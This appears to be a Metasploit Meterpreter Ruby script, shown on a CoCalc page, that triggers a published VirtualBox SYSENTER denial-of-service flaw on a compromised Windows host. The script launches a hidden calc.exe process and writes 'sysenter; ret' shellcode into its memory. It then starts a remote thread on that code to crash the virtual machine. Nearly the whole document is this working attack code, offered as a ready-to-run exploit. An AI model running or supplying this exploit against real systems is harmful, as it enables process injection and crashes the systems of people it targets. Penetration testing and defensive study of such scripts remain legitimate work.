CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

1
##
2
# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
3
# If you'd like to improve this script, please try to port it as a post
4
# module instead. Thank you.
5
##
6

7

8
# Meterpreter script for triggering the VirtualBox DoS published at:
9
# http://milw0rm.com/exploits/9323
10

11
opts = Rex::Parser::Arguments.new(
12
  "-h" => [ false,"Help menu." ]
13
)
14

15
opts.parse(args) { |opt, idx, val|
16
  case opt
17
  when "-h"
18
    print_line("virtualbox_sysenter_dos -- trigger the VirtualBox DoS published at http://milw0rm.com/exploits/9323")
19
    print_line("USAGE: run virtualbox_sysenter_dos")
20
    print_status(opts.usage)
21
    raise Rex::Script::Completed
22
  end
23
}
24

25
#check for proper Meterpreter Platform
26
def unsupported
27
  print_error("This version of Meterpreter is not supported with this Script!")
28
  raise Rex::Script::Completed
29
end
30
unsupported if client.platform != 'windows'
31

32
# Spawn calculator
33
pid = client.sys.process.execute("calc.exe", nil, {'Hidden' => 'true'}).pid
34
print_status("Calculator PID is #{pid}")
35

36
calc = client.sys.process.open(pid, PROCESS_ALL_ACCESS)
37

38
# Allocate some memory
39
mem  = calc.memory.allocate(32)
40

41
print_status("Allocated memory at address #{"0x%.8x" % mem}")
42

43
# Write the trigger shellcode
44
# sysenter
45
# ret
46
calc.memory.write(mem, "\x0f\x34\xc3")
47

48
print_status("VirtualBox SYSENTER Denial of Service launching...")
49

50
# Create a new thread on the shellcode pointer
51
calc.thread.create(mem, 0)
52

53
print_status("VirtualBox SYSENTER Denial of Service delivered.")
54

55

56